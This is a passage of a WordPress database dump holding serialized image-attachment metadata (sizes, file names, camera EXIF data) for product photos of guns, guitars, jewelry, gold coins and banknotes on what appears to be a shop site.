Arena\";s:12:\"focal_length\";s:2:\"25\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:15:\"Vintage Guitars\";s:11:\"orientation\";i:1;}}'),(438,211,'_wp_attached_file','2015/03/Guns.jpg'),(439,211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1774;s:6:\"height\";i:1128;s:4:\"file\";s:16:\"2015/03/Guns.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Guns-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Guns-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:17:\"Guns-1024x651.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:651;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"Guns-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"Guns-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:16:\"Guns-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"Guns-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Guns-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:15:\"Guns-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:17:\"Alexander Shadrin\";s:6:\"camera\";s:10:\"NIKON D700\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1413306778;s:9:\"copyright\";s:40:\"Alexander Shadrin (www.sundrawPhoto.com)\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(440,210,'_edit_lock','1426013143:2'),(443,214,'_wp_attached_file','2015/03/N.-Lombard-e1426016020531.jpg'),(444,214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:850;s:6:\"height\";i:493;s:4:\"file\";s:37:\"2015/03/N.-Lombard-e1426016020531.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:2.7999999999999998;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1425560325;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"20\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:3:\"0.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(448,215,'_wp_attached_file','2015/03/Colored-Rings.jpg'),(449,215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1155;s:4:\"file\";s:25:\"2015/03/Colored-Rings.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Colored-Rings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Colored-Rings-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Colored-Rings-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Colored-Rings-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Colored-Rings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Colored-Rings-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Colored-Rings-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Colored-Rings-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"Colored-Rings-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:9;s:6:\"credit\";s:16:\"Laura Passavanti\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:45:\"Closeup of gold jewelery with precious stones\";s:17:\"created_timestamp\";i:1338402805;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:3:\"0.5\";s:5:\"title\";s:12:\"Gold Jewelry\";s:11:\"orientation\";i:1;}}'),(445,214,'_edit_lock','1426016331:2'),(446,214,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:5324;s:6:\"height\";i:3089;s:4:\"file\";s:14:\"N.-Lombard.jpg\";}s:18:\"full-1426015716189\";a:3:{s:5:\"width\";i:640;s:6:\"height\";i:371;s:4:\"file\";s:29:\"N.-Lombard-e1426015557530.jpg\";}}'),(447,214,'_edit_last','2'),(450,216,'_wp_attached_file','2015/03/Gun-Barrel.jpg'),(451,216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1155;s:4:\"file\";s:22:\"2015/03/Gun-Barrel.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Gun-Barrel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Gun-Barrel-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Gun-Barrel-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"Gun-Barrel-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"Gun-Barrel-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Gun-Barrel-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Gun-Barrel-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Gun-Barrel-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:21:\"Gun-Barrel-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:5;s:6:\"credit\";s:7:\"unknown\";s:6:\"camera\";s:13:\"Canon EOS 20D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1301763573;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"72\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(452,217,'_wp_attached_file','2015/03/Guitars-.jpg'),(453,217,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1155;s:4:\"file\";s:20:\"2015/03/Guitars-.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Guitars--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Guitars--300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"Guitars--1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"Guitars--90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"Guitars--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"Guitars--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"Guitars--200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Guitars--1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:19:\"Guitars--100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:6.2999999999999998;s:6:\"credit\";s:10:\"Andrew Lam\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:66:\"Many electric guitars hanging on wall in the music instrument shop\";s:17:\"created_timestamp\";i:1375195208;s:9:\"copyright\";s:43:\"All Rights Reserve\randrew.lamty@hotmail.com\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:1:\"1\";s:5:\"title\";s:15:\"Electric Guitar\";s:11:\"orientation\";i:1;}}'),(454,218,'_wp_attached_file','2015/03/Diamond-Rings.jpg'),(455,218,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1633;s:6:\"height\";i:1225;s:4:\"file\";s:25:\"2015/03/Diamond-Rings.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Diamond-Rings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Diamond-Rings-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Diamond-Rings-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Diamond-Rings-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Diamond-Rings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Diamond-Rings-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Diamond-Rings-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Diamond-Rings-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"Diamond-Rings-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:18:\"Yuriy Tikhonovskyy\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:34:\"Diamond ring on a black background\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:24:\"© by Yuriy Tikhonovskyy\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:12:\"Diamond ring\";s:11:\"orientation\";i:1;}}'),(456,219,'_wp_attached_file','2015/03/Colored-Stone-Rings.jpg'),(457,219,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1588;s:6:\"height\";i:1260;s:4:\"file\";s:31:\"2015/03/Colored-Stone-Rings.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Colored-Stone-Rings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Colored-Stone-Rings-300x238.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"Colored-Stone-Rings-1024x812.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:812;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"Colored-Stone-Rings-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"Colored-Stone-Rings-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"Colored-Stone-Rings-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"Colored-Stone-Rings-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Colored-Stone-Rings-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:30:\"Colored-Stone-Rings-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:11;s:6:\"credit\";s:5:\"Kvach\";s:6:\"camera\";s:10:\"PENTAX K-r\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1355698814;s:9:\"copyright\";s:5:\"KVACH\";s:12:\"focal_length\";s:2:\"90\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(459,222,'_wp_attached_file','2015/02/Loans1.jpg'),(460,222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1157;s:4:\"file\";s:18:\"2015/02/Loans1.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Loans1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Loans1-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"Loans1-1024x686.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:686;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"Loans1-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"Loans1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"Loans1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"Loans1-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Loans1-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:17:\"Loans1-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:5.5999999999999996;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"NIKON D80\";s:7:\"caption\";s:34:\"dollar banks note money background\";s:17:\"created_timestamp\";i:1358943292;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:33:\"Dollar bank note money background\";s:11:\"orientation\";i:1;}}'),(461,223,'_wp_attached_file','2015/02/Gold_Diamond-Jewelry-e1426031253556.jpg'),(462,223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1410;s:6:\"height\";i:996;s:4:\"file\";s:47:\"2015/02/Gold_Diamond-Jewelry-e1426031253556.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"Gold_Diamond-Jewelry-e1426031253556-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"Gold_Diamond-Jewelry-e1426031253556-1024x723.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:723;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Gold_Diamond-Jewelry-e1426031253556-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:47:\"Gold_Diamond-Jewelry-e1426031253556-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:47:\"Gold_Diamond-Jewelry-e1426031253556-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:47:\"Gold_Diamond-Jewelry-e1426031253556-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:48:\"Gold_Diamond-Jewelry-e1426031253556-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:46:\"Gold_Diamond-Jewelry-e1426031253556-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:9;s:6:\"credit\";s:16:\"Laura Passavanti\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:45:\"Closeup of gold jewelery with precious stones\";s:17:\"created_timestamp\";i:1338411212;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:1:\"1\";s:5:\"title\";s:12:\"Gold Jewelry\";s:11:\"orientation\";i:1;}}'),(463,224,'_wp_attached_file','2015/02/Gold-Jewelry.jpg'),(464,224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1155;s:4:\"file\";s:24:\"2015/02/Gold-Jewelry.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Gold-Jewelry-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Gold-Jewelry-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Gold-Jewelry-1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:23:\"Gold-Jewelry-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:9;s:6:\"credit\";s:16:\"Laura Passavanti\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:53:\"Closeup of yellow gold jewelery on a black background\";s:17:\"created_timestamp\";i:1338410477;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:3:\"0.6\";s:5:\"title\";s:12:\"Gold Jewelry\";s:11:\"orientation\";i:1;}}'),(465,225,'_wp_attached_file','2015/02/Gold-Coins.jpg'),(466,225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:900;s:4:\"file\";s:22:\"2015/02/Gold-Coins.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Gold-Coins-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"Gold-Coins-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:23:\"Gold-Coins-1200x588.jpg\";s:5:\"width\";i:1200;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:21:\"Gold-Coins-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:7.0999999999999996;s:6:\"credit\";s:11:\"REMY MUSSER\";s:6:\"camera\";s:4:\"E-M5\";s:7:\"caption\";s:27:\"Five Dollars gold coins USD\";s:17:\"created_timestamp\";i:1387734018;s:9:\"copyright\";s:13:\"NETFALLS 2013\";s:12:\"focal_length\";s:2:\"43\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:23:\"Five Dollars gold coins\";s:11:\"orientation\";i:1;}}'),(467,223,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1414;s:6:\"height\";i:1414;s:4:\"file\";s:24:\"Gold_Diamond-Jewelry.jpg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:34:\"Gold_Diamond-Jewelry-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:30:\"Gold_Diamond-Jewelry-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"slider-post-thumbnail-orig\";a:4:{s:4:\"fil